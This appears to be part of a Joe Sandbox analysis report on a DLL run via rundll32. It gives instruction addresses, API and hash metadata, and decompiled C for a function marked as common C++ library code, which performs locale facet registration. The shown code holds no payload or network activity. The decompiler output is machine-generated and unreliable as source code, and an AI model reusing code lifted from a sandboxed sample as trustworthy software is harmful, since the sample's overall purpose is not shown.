                          0x6e20ef25
                          0x6e20ef6a
                          0x6e20ef6d
                          0x6e20ef79
                          0x6e20ef27
                          0x6e20ef29
                          0x6e20ef2f
                          0x6e20ef35
                          0x6e20ef3d
                          0x6e20ef40
                          0x6e20ef7d
                          0x6e20ef8b
                          0x6e20ef90
                          0x6e20ef98
                          0x6e20efa2
                          0x6e20efa7
                          0x6e20efb2
                          0x6e20efb6
                          0x6e20efb9
                          0x6e20efbe
                          0x6e20efc7
                          0x6e20efc9
                          0x6e20efcb
                          0x6e20f010
                          0x6e20f013
                          0x6e20f01f
                          0x6e20efcd
                          0x6e20efcd
                          0x6e20efcf
                          0x6e20efd5
                          0x6e20efdb
                          0x6e20efe3
                          0x6e20efe6
                          0x6e20f023
                          0x6e20f031
                          0x6e20f036
                          0x6e20f03e
                          0x6e20f048
                          0x6e20f04d
                          0x6e20f058
                          0x6e20f05c
                          0x6e20f05f
                          0x6e20f064
                          0x6e20f06d
                          0x6e20f06f
                          0x6e20f071
                          0x6e20f0b6
                          0x6e20f0b9
                          0x6e20f0c5
                          0x6e20f073
                          0x6e20f073
                          0x6e20f075
                          0x6e20f07b
                          0x6e20f081
                          0x6e20f089
                          0x6e20f08c
                          0x6e20f0c9
                          0x6e20f0d7
                          0x6e20f0dc
                          0x6e20f0e4
                          0x6e20f0ee
                          0x6e20f0f3
                          0x6e20f0fe
                          0x6e20f102
                          0x6e20f105
                          0x6e20f10a
                          0x6e20f113
                          0x6e20f115
                          0x6e20f117
                          0x6e20f15c
                          0x6e20f15f
                          0x6e20f16b
                          0x6e20f119
                          0x6e20f119
                          0x6e20f11b
                          0x6e20f121
                          0x6e20f127
                          0x6e20f12f
                          0x6e20f132
                          0x6e20f16f
                          0x6e20f17d
                          0x6e20f182
                          0x6e20f18a
                          0x6e20f194
                          0x6e20f199
                          0x6e20f1a4
                          0x6e20f1a8
                          0x6e20f1ab
                          0x6e20f1b0
                          0x6e20f1b9
                          0x6e20f1bb
                          0x6e20f1bd
                          0x6e20f202
                          0x6e20f205
                          0x6e20f211
                          0x6e20f1bf
                          0x6e20f1bf
                          0x6e20f1c1
                          0x6e20f1c7
                          0x6e20f1cd
                          0x6e20f1d5
                          0x6e20f1d8
                          0x6e20f215
                          0x6e20f223
                          0x6e20f228
                          0x6e20f230
                          0x6e20f23a
                          0x6e20f23f
                          0x6e20f24a
                          0x6e20f24e
                          0x6e20f251
                          0x6e20f256
                          0x6e20f25f
                          0x6e20f261
                          0x6e20f263
                          0x6e20f2a8
                          0x6e20f2ab
                          0x6e20f2b7
                          0x6e20f265
                          0x6e20f265
                          0x6e20f267
                          0x6e20f26d
                          0x6e20f273
                          0x6e20f27b
                          0x6e20f27e
                          0x6e20f2bb
                          0x6e20f2c9
                          0x6e20f2ce
                          0x6e20f2d6
                          0x6e20f2e0
                          0x6e20f2e5
                          0x6e20f2f0
                          0x6e20f2f4
                          0x6e20f2f7
                          0x6e20f2fc
                          0x6e20f305
                          0x6e20f307
                          0x6e20f309
                          0x6e20f34e
                          0x6e20f351
                          0x6e20f35d
                          0x6e20f30b
                          0x6e20f30b
                          0x6e20f30d
                          0x6e20f313
                          0x6e20f319
                          0x6e20f321
                          0x6e20f324
                          0x6e20f361
                          0x6e20f36f
                          0x6e20f374
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3ab
                          0x6e20f3ad
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1
                          0x6e20f134
                          0x6e20f134
                          0x6e20f137
                          0x6e20f13b
                          0x6e20f13f
                          0x6e20f14c
                          0x6e20f154
                          0x6e20f156
                          0x00000000
                          0x6e20f156
                          0x6e20f11d
                          0x6e20f11d
                          0x00000000
                          0x6e20f11d
                          0x6e20f11b
                          0x6e20f08e
                          0x6e20f08e
                          0x6e20f091
                          0x6e20f095
                          0x6e20f099
                          0x6e20f0a6
                          0x6e20f0ae
                          0x6e20f0b0
                          0x00000000
                          0x6e20f0b0
                          0x6e20f077
                          0x6e20f077
                          0x00000000
                          0x6e20f077
                          0x6e20f075
                          0x6e20efe8
                          0x6e20efe8
                          0x6e20efeb
                          0x6e20efef
                          0x6e20eff3
                          0x6e20f000
                          0x6e20f008
                          0x6e20f00a
                          0x00000000
                          0x6e20f00a
                          0x6e20efd1
                          0x6e20efd1
                          0x00000000
                          0x6e20efd1
                          0x6e20efcf
                          0x6e20ef42
                          0x6e20ef42
                          0x6e20ef45
                          0x6e20ef49
                          0x6e20ef4d
                          0x6e20ef5a
                          0x6e20ef62
                          0x6e20ef64
                          0x00000000
                          0x6e20ef64
                          0x6e20ef2b
                          0x6e20ef2b
                          0x00000000
                          0x6e20ef2b
                          0x6e20ef29

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20EEF2
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20EEFC
                          • int.LIBCPMT ref: 6E20EF13
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • codecvt.LIBCPMT ref: 6E20EF36
                          • std::_Facet_Register.LIBCPMT ref: 6E20EF4D
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20EF6D
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20EF8B
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
                          • String ID: 0k,n
                          • API String ID: 2594415655-114697357
                          • Opcode ID: 8b756e5784a4f5490271d43bef1c0ecc3b16846255bc20116ac77fd3c7765d7a
                          • Instruction ID: 5986fe8daf7e90926c789368786eb62b9e312487daab31bd92e13b7db7bf81cc
                          • Opcode Fuzzy Hash: 8b756e5784a4f5490271d43bef1c0ecc3b16846255bc20116ac77fd3c7765d7a
                          • Instruction Fuzzy Hash: 9C11E375A1091ECBCF00EBE0C898AEDB77BAF44714F140909E4107B2D0DBB49E80CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F6B3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F6B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t153;
				signed int _t154;
				void* _t166;
				void* _t179;
				void* _t192;
				void* _t205;
				void* _t218;
				void* _t231;
				void* _t244;
				void* _t257;
				void* _t270;
				signed int _t397;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;

				_t428 = __edx;
				_t327 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t462 - 0x14, 0);
				_t441 =  *0x6e2c6dc8; // 0x0
				 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
				 *(_t462 - 0x10) = _t441;
				_t153 = E6E1E161C(0x6e2c6d7c);
				_t330 =  *((intOrPtr*)(_t462 + 8));
				_t154 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t153);
				_t430 = _t154;
				if(_t154 != 0) {
					L5:
					E6E2066BA(_t462 - 0x14);
					return E6E220075(_t430);
				} else {
					if(_t441 == 0) {
						_push( *((intOrPtr*)(_t462 + 8)));
						_push(_t462 - 0x10);
						__eflags = E6E211230(__ebx, _t330, __edx, _t430, _t441) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t462 - 0x20);
							E6E223D74(_t462 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t430, _t441, 0x14);
							E6E206653(_t462 - 0x14, 0);
							_t442 =  *0x6e2c6dc4; // 0x0
							 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
							 *(_t462 - 0x10) = _t442;
							_t166 = E6E1E161C(0x6e2c6d78);
							_t337 =  *((intOrPtr*)(_t462 + 8));
							_t431 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t166);
							__eflags = _t431;
							if(_t431 != 0) {
								L12:
								E6E2066BA(_t462 - 0x14);
								return E6E220075(_t431);
							} else {
								__eflags = _t442;
								if(_t442 == 0) {
									_push( *((intOrPtr*)(_t462 + 8)));
									_push(_t462 - 0x10);
									__eflags = E6E2112B4(_t327, _t337, __edx, _t431, _t442) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t462 - 0x20);
										E6E223D74(_t462 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t327, _t431, _t442, 0x14);
										E6E206653(_t462 - 0x14, 0);
										_t443 =  *0x6e2c6dd8; // 0x0
										 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
										 *(_t462 - 0x10) = _t443;
										_t179 = E6E1E161C(0x6e2c6d84);
										_t344 =  *((intOrPtr*)(_t462 + 8));
										_t432 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t179);
										__eflags = _t432;
										if(_t432 != 0) {
											L19:
											E6E2066BA(_t462 - 0x14);
											return E6E220075(_t432);
										} else {
											__eflags = _t443;
											if(_t443 == 0) {
												_push( *((intOrPtr*)(_t462 + 8)));
												_push(_t462 - 0x10);
												__eflags = E6E211339(_t327, _t344, __edx, _t432, _t443) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t462 - 0x20);
													E6E223D74(_t462 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t327, _t432, _t443, 0x14);
													E6E206653(_t462 - 0x14, 0);
													_t444 =  *0x6e2c6db0; // 0x0
													 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
													 *(_t462 - 0x10) = _t444;
													_t192 = E6E1E161C(0x6e2c6d64);
													_t351 =  *((intOrPtr*)(_t462 + 8));
													_t433 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t192);
													__eflags = _t433;
													if(_t433 != 0) {
														L26:
														E6E2066BA(_t462 - 0x14);
														return E6E220075(_t433);
													} else {
														__eflags = _t444;
														if(_t444 == 0) {
															_push( *((intOrPtr*)(_t462 + 8)));
															_push(_t462 - 0x10);
															__eflags = E6E2113A1(_t327, _t351, _t428, _t433, _t444) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t462 - 0x20);
																E6E223D74(_t462 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t327, _t433, _t444, 0x14);
																E6E206653(_t462 - 0x14, 0);
																_t445 =  *0x6e2c6ddc; // 0x0
																 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																 *(_t462 - 0x10) = _t445;
																_t205 = E6E1E161C(0x6e2c6d88);
																_t358 =  *((intOrPtr*)(_t462 + 8));
																_t434 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t205);
																__eflags = _t434;
																if(_t434 != 0) {
																	L33:
																	E6E2066BA(_t462 - 0x14);
																	return E6E220075(_t434);
																} else {
																	__eflags = _t445;
																	if(_t445 == 0) {
																		_push( *((intOrPtr*)(_t462 + 8)));
																		_push(_t462 - 0x10);
																		__eflags = E6E211409(_t327, _t358, _t428, _t434, _t445) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t462 - 0x20);
																			E6E223D74(_t462 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t327, _t434, _t445, 0x14);
																			E6E206653(_t462 - 0x14, 0);
																			_t446 =  *0x6e2c6de0; // 0x0
																			 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																			 *(_t462 - 0x10) = _t446;
																			_t218 = E6E1E161C(0x6e2c6d8c);
																			_t365 =  *((intOrPtr*)(_t462 + 8));
																			_t435 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t218);
																			__eflags = _t435;
																			if(_t435 != 0) {
																				L40:
																				E6E2066BA(_t462 - 0x14);
																				return E6E220075(_t435);
																			} else {
																				__eflags = _t446;
																				if(_t446 == 0) {
																					_push( *((intOrPtr*)(_t462 + 8)));
																					_push(_t462 - 0x10);
																					__eflags = E6E211471(_t327, _t365, _t428, _t435, _t446) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t462 - 0x20);
																						E6E223D74(_t462 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t327, _t435, _t446, 0x14);
																						E6E206653(_t462 - 0x14, 0);
																						_t447 =  *0x6e2c6dfc; // 0x0
																						 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																						 *(_t462 - 0x10) = _t447;
																						_t231 = E6E1E161C(0x6e2c6da8);
																						_t372 =  *((intOrPtr*)(_t462 + 8));
																						_t436 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t231);
																						__eflags = _t436;
																						if(_t436 != 0) {
																							L47:
																							E6E2066BA(_t462 - 0x14);
																							return E6E220075(_t436);
																						} else {
																							__eflags = _t447;
																							if(_t447 == 0) {
																								_push( *((intOrPtr*)(_t462 + 8)));
																								_push(_t462 - 0x10);
																								__eflags = E6E2114EC(_t327, _t372, _t428, _t436, _t447) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t462 - 0x20);
																									E6E223D74(_t462 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t327, _t436, _t447, 0x14);
																									E6E206653(_t462 - 0x14, 0);
																									_t448 =  *0x6e2c6dcc; // 0x0
																									 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																									 *(_t462 - 0x10) = _t448;
																									_t244 = E6E1E161C(0x6e2c6d80);
																									_t379 =  *((intOrPtr*)(_t462 + 8));
																									_t437 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t244);
																									__eflags = _t437;
																									if(_t437 != 0) {
																										L54:
																										E6E2066BA(_t462 - 0x14);
																										return E6E220075(_t437);
																									} else {
																										__eflags = _t448;
																										if(_t448 == 0) {
																											_push( *((intOrPtr*)(_t462 + 8)));
																											_push(_t462 - 0x10);
																											__eflags = E6E211558(_t327, _t379, _t428, _t437, _t448) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t462 - 0x20);
																												E6E223D74(_t462 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t327, _t437, _t448, 0x14);
																												E6E206653(_t462 - 0x14, 0);
																												_t449 =  *0x6e2c6e00; // 0x0
																												 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																												 *(_t462 - 0x10) = _t449;
																												_t257 = E6E1E161C(0x6e2c6dac);
																												_t386 =  *((intOrPtr*)(_t462 + 8));
																												_t438 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t257);
																												__eflags = _t438;
																												if(_t438 != 0) {
																													L61:
																													E6E2066BA(_t462 - 0x14);
																													return E6E220075(_t438);
																												} else {
																													__eflags = _t449;
																													if(_t449 == 0) {
																														_push( *((intOrPtr*)(_t462 + 8)));
																														_push(_t462 - 0x10);
																														__eflags = E6E2115C4(_t327, _t386, _t428, _t438, _t449) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t462 - 0x20);
